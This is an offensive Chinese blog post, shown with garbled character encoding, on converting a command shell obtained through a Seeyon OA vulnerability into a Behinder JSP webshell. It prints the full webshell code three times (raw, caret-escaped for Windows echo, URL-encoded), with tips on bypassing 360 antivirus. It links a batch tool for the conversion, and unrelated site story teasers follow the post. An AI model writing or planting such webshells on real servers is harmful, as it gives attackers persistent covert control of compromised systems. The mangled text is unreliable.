如何優(yōu)雅的把cmdshell升級為一句話 ——yzddMr6

前言

前一段時(shí)間致遠(yuǎn)OA的洞坑了不少公司

自己也復(fù)現(xiàn)了一下 但是有個很惡心的問題就是 默認(rèn)的payload是有長度限制的并且只是一個cmd的shell

Linux的shell還比較靈活 但是win的來說就不太方便了

特別是配合上惡心的url編碼在瀏覽器里面遇到反斜杠就gg

那么怎么把cmdshell優(yōu)雅的轉(zhuǎn)化為可以連接的一句話呢

看了以前的帖子大概有這幾個辦法

Js+cscript
Certutil +base64
Win7以上還有bitsadmin  
Ps 
等等等等

Bitsadmin就不說了

Certutil跟cscript遠(yuǎn)程下載其實(shí)也不錯

但是有兩個問題

1 如果主機(jī)不通外網(wǎng)就gg
2 360會攔截

綜合來說都有自己的不足之處

還是一句話echo最穩(wěn)了

自己也研究了一下 但是用echo寫馬有兩個天坑

1.win的尖括號轉(zhuǎn)義

image

Win的尖括號要用^來轉(zhuǎn)義而不是反斜杠

如果你要是放到引號里會把引號一起打印出來

image

2. 沙雕url編碼

https://www.cnblogs.com/i80386/p/4576699.html

大家可以自己去網(wǎng)上找一下帖子到底u(yù)rl編碼有多混亂尤误。惫皱。。。

這里就說說python的requests模塊的url編碼

經(jīng)過測試

空格=>%20
%空格=>%%20
%20=>%20

也就是說 他在默認(rèn)遇到百分號開頭的字符串的時(shí)候 request模塊會把它當(dāng)做已經(jīng)編碼過的字符 直接發(fā)送過去

但是他就帶來個問題不會自動編碼百分號

所以你只把尖括號跟百分號轉(zhuǎn)義過后的payload放到py腳本里還是不能正常執(zhí)行

這里偷了個懶直接找的在線網(wǎng)站将塑,把它編碼一遍再放到python里

http://tool.chinaz.com/tools/urlencode.aspx

綜上:

原來payload(冰蝎為例)

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

尖括號轉(zhuǎn)義=>

^<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%^>^<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%^>^<%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%^>

url編碼=>

%5e%3c%25%40page+import%3d%22java.util.*%2cjavax.crypto.*%2cjavax.crypto.spec.*%22%25%5e%3e%5e%3c%25!class+U+extends+ClassLoader%7bU(ClassLoader+c)%7bsuper(c)%3b%7dpublic+Class+g(byte+%5b%5db)%7breturn+super.defineClass(b%2c0%2cb.length)%3b%7d%7d%25%5e%3e%5e%3c%25if(request.getParameter(%22pass%22)!%3dnull)%7bString+k%3d(%22%22%2bUUID.randomUUID()).replace(%22-%22%2c%22%22).substring(16)%3bsession.putValue(%22u%22%2ck)%3bout.print(k)%3breturn%3b%7dCipher+c%3dCipher.getInstance(%22AES%22)%3bc.init(2%2cnew+SecretKeySpec((session.getValue(%22u%22)%2b%22%22).getBytes()%2c%22AES%22))%3bnew+U(this.getClass().getClassLoader()).g(c.doFinal(new+sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3b%25%5e%3e

然后寫個輪子
就可以批量cmd轉(zhuǎn)一句話啦

image
image

寫了個腳本

支持批量檢測跟單個檢測

如果是

http://

開頭的就識別成單個

xxx.txt就是批量

需要設(shè)置一下腳本里面的cmdshell地址跟密碼

項(xiàng)目地址:

https://github.com/yzddmr6/cmd2bx

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末另凌,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子双仍,更是在濱河造成了極大的恐慌向图,老刑警劉巖泳秀,帶你破解...
    沈念sama閱讀 221,331評論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件标沪,死亡現(xiàn)場離奇詭異榄攀,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)金句,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,372評論 3 398
  • 文/潘曉璐 我一進(jìn)店門檩赢,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事贞瞒∨挤浚” “怎么了?”我有些...
    開封第一講書人閱讀 167,755評論 0 360
  • 文/不壞的土叔 我叫張陵军浆,是天一觀的道長棕洋。 經(jīng)常有香客問我,道長乒融,這世上最難降的妖魔是什么掰盘? 我笑而不...
    開封第一講書人閱讀 59,528評論 1 296
  • 正文 為了忘掉前任,我火速辦了婚禮赞季,結(jié)果婚禮上愧捕,老公的妹妹穿的比我還像新娘。我一直安慰自己申钩,他們只是感情好次绘,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,526評論 6 397
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著撒遣,像睡著了一般邮偎。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上义黎,一...
    開封第一講書人閱讀 52,166評論 1 308
  • 那天钢猛,我揣著相機(jī)與錄音,去河邊找鬼轩缤。 笑死命迈,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的火的。 我是一名探鬼主播壶愤,決...
    沈念sama閱讀 40,768評論 3 421
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼馏鹤!你這毒婦竟也來了征椒?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,664評論 0 276
  • 序言:老撾萬榮一對情侶失蹤湃累,失蹤者是張志新(化名)和其女友劉穎勃救,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體治力,經(jīng)...
    沈念sama閱讀 46,205評論 1 319
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡蒙秒,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,290評論 3 340
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了宵统。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片晕讲。...
    茶點(diǎn)故事閱讀 40,435評論 1 352
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出瓢省,到底是詐尸還是另有隱情弄息,我是刑警寧澤,帶...
    沈念sama閱讀 36,126評論 5 349
  • 正文 年R本政府宣布勤婚,位于F島的核電站摹量,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏馒胆。R本人自食惡果不足惜荆永,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,804評論 3 333
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望国章。 院中可真熱鬧具钥,春花似錦、人聲如沸液兽。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,276評論 0 23
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽四啰。三九已至宁玫,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間柑晒,已是汗流浹背欧瘪。 一陣腳步聲響...
    開封第一講書人閱讀 33,393評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留匙赞,地道東北人佛掖。 一個月前我還...
    沈念sama閱讀 48,818評論 3 376
  • 正文 我出身青樓,卻偏偏與公主長得像涌庭,于是被迫代替她去往敵國和親芥被。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,442評論 2 359